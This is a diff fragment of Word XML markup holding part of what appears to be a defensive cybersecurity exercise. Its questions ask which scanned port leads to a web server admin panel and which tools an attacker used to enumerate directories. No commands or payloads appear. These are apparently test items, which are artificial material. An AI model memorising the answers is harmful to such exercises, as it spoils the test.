+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>as</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>result</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>active</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>scan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>these</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ports</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>provides</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>access</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> admin </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>panel</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C081390" wp14:editId="46ABDF4D">
+            <wp:extent cx="5943600" cy="3931920"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1783973239" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1783973239" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId8"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3931920"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q4</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Following</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>discovery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ports</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>it</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>appears</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>that</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attempted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>enumerate</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>uncover</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>directories</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>files</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>tools</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> can </w:t>
